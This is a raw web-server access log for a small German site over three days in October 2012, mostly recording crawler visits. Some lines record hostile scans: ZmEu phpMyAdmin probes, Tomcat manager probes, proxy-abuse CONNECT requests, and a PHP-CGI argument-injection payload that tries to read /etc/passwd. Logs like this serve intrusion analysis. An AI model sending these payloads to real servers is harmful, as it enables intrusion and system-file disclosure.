94.23.45.14 - - [16/Oct/2012:11:24:02 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
66.249.76.40 - - [16/Oct/2012:11:48:15 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.40 - - [16/Oct/2012:11:48:15 +0200] "GET /seiten/optiplus_detail.php?det=lager HTTP/1.1" 404 336 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.40 - - [16/Oct/2012:11:59:06 +0200] "GET /seiten/datenschutz.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.154.179.250 - - [16/Oct/2012:12:51:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.246.165.180 - - [16/Oct/2012:13:59:54 +0200] "GET /robots.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.180 - - [16/Oct/2012:13:59:54 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlberlin-ufb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [16/Oct/2012:14:41:38 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [16/Oct/2012:14:41:39 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizlpreiseberlin-2zb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.187.42 - - [16/Oct/2012:14:49:02 +0200] "GET /robots.txt HTTP/1.0" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.187.42 - - [16/Oct/2012:14:49:02 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferantberlin-69b.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.17.190 - - [16/Oct/2012:15:21:51 +0200] "GET /robots.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
216.145.17.190 - - [16/Oct/2012:15:21:51 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--essohndler-u5a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [16/Oct/2012:15:34:31 +0200] "GET /robots.txt HTTP/1.0" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.140 - - [16/Oct/2012:15:34:31 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--heizllieferungen-pwb.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.50 - - [16/Oct/2012:17:18:44 +0200] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.165.50 - - [16/Oct/2012:17:18:45 +0200] "GET / HTTP/1.1" 200 1229 "http://whois.domaintools.com/xn--premiuml-t4a.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
178.25.93.230 - - [16/Oct/2012:17:35:23 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [16/Oct/2012:17:35:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
176.9.155.226 - - [16/Oct/2012:17:42:42 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [16/Oct/2012:17:42:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.77.126.55 - - [16/Oct/2012:17:48:41 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.77.126.55 - - [16/Oct/2012:17:48:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CareerBot/1.1; +http://www.career-x.de/bot.html)"
178.25.93.230 - - [16/Oct/2012:20:04:53 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [16/Oct/2012:20:04:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [16/Oct/2012:20:52:03 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.25.93.230 - - [16/Oct/2012:20:52:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.125.196 - - [16/Oct/2012:21:14:12 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.125.196 - - [16/Oct/2012:21:14:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.0.61.144 - - [16/Oct/2012:22:13:23 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.0.61.144 - - [16/Oct/2012:22:13:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
223.4.82.92 - - [16/Oct/2012:23:11:38 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
91.64.202.163 - - [17/Oct/2012:00:22:08 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
91.64.202.163 - - [17/Oct/2012:00:22:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.154.179.250 - - [17/Oct/2012:01:38:14 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.32.93 - - [17/Oct/2012:05:08:16 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.93 - - [17/Oct/2012:05:09:02 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [17/Oct/2012:07:04:02 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
61.244.111.76 - - [17/Oct/2012:07:33:28 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:28 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:28 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:28 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:29 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:29 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:29 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:30 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:31 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:34 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:35 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:36 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:37 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:40 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:42 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:43 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
61.244.111.76 - - [17/Oct/2012:07:33:51 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
157.55.33.113 - - [17/Oct/2012:07:46:53 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
213.251.194.173 - - [17/Oct/2012:07:47:52 +0200] "CONNECT api.login.icq.net:443 HTTP/1.0" 405 347 "-" "-"
213.251.194.173 - - [17/Oct/2012:07:47:52 +0200] "CONNECT api.login.icq.net:443 HTTP/1.0" 405 347 "-" "-"
213.251.194.173 - - [17/Oct/2012:07:47:53 +0200] "CONNECT api.login.icq.net:443 HTTP/1.0" 405 347 "-" "-"
213.251.194.173 - - [17/Oct/2012:07:48:01 +0200] "CONNECT api.login.icq.net:443 HTTP/1.0" 405 347 "-" "-"
157.55.33.113 - - [17/Oct/2012:08:03:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [17/Oct/2012:08:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
176.9.155.226 - - [17/Oct/2012:09:46:19 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [17/Oct/2012:09:46:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
178.154.179.250 - - [17/Oct/2012:10:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
80.187.106.94 - - [17/Oct/2012:11:07:52 +0200] "GET / HTTP/1.1" 200 1229 "http://www.khs-halle.de/2_innungen/parkett/parkett_firmen_15.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 800)"
157.55.33.22 - - [17/Oct/2012:11:11:51 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.22 - - [17/Oct/2012:11:13:20 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
184.107.227.10 - - [17/Oct/2012:11:40:06 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
175.41.175.77 - - [17/Oct/2012:11:57:00 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
41.139.66.50 - - [17/Oct/2012:12:30:00 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
87.142.136.197 - - [17/Oct/2012:15:38:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
87.142.136.197 - - [17/Oct/2012:15:38:38 +0200] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
5.9.107.48 - - [17/Oct/2012:15:42:12 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
5.9.107.48 - - [17/Oct/2012:15:42:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.124.160 - - [17/Oct/2012:16:26:53 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
173.242.124.160 - - [17/Oct/2012:16:26:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
92.240.68.153 - - [17/Oct/2012:17:25:03 +0200] "GET http://www.nutrition-and-you.com/image-files/boiled-corncobs.jpg HTTP/1.1" 404 348 "-" "webcollage/1.135a"
109.45.0.114 - - [17/Oct/2012:17:43:15 +0200] "GET / HTTP/1.1" 200 1229 "http://www.unternehmen24.info/Firmeninformationen/DE/3207216" "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3"
157.55.32.93 - - [17/Oct/2012:18:17:25 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.93 - - [17/Oct/2012:18:46:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
78.30.200.81 - - [18/Oct/2012:01:06:56 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [18/Oct/2012:01:06:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [18/Oct/2012:01:12:49 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.30.200.81 - - [18/Oct/2012:01:12:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
178.154.179.250 - - [18/Oct/2012:01:13:09 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
216.240.136.96 - - [18/Oct/2012:01:24:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
176.9.155.226 - - [18/Oct/2012:01:48:33 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [18/Oct/2012:01:48:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
87.142.154.202 - - [18/Oct/2012:05:37:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
87.142.154.202 - - [18/Oct/2012:05:37:09 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
157.56.93.108 - - [18/Oct/2012:06:43:33 +0200] "(direct)|utmcsr=(direct)|utmcmd=(none)" 501 353 "-" "-"
87.142.154.202 - - [18/Oct/2012:07:27:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
87.142.154.202 - - [18/Oct/2012:07:27:53 +0200] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
178.154.179.250 - - [18/Oct/2012:08:17:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:31 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:35 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
111.9.120.15 - - [18/Oct/2012:09:38:35 +0200] "HEAD /manager/html HTTP/1.0" 404 - "-" "-"
157.56.92.162 - - [18/Oct/2012:13:17:20 +0200] "roxy-Connection: Keep-Alive" 400 329 "-" "-"
94.102.51.246 - - [18/Oct/2012:13:32:54 +0200] "GET http://24x7-allrequestsallowed.com/?PHPSESSID=7ab745aa00143SSQJ_W_EFBF%5CD HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
176.9.148.197 - - [18/Oct/2012:16:26:50 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.148.197 - - [18/Oct/2012:16:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
222.73.21.47 - - [18/Oct/2012:16:32:45 +0200] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
176.9.155.226 - - [18/Oct/2012:17:32:58 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.155.226 - - [18/Oct/2012:17:32:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
85.178.99.47 - - [18/Oct/2012:17:34:22 +0200] "GET /robots.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
85.178.99.47 - - [18/Oct/2012:17:34:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
157.55.32.93 - - [18/Oct/2012:19:46:25 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.32.93 - - [18/Oct/2012:19:59:16 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
223.255.179.115 - - [18/Oct/2012:22:44:18 +0200] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1" 200 1229 "-" "curl/7.19.4 (i386-redhat-linux-gnu) libcurl/7.19.4 NSS/3.12.2.0 zlib/1.2.3 libidn/0.6.14 libssh2/0.18"
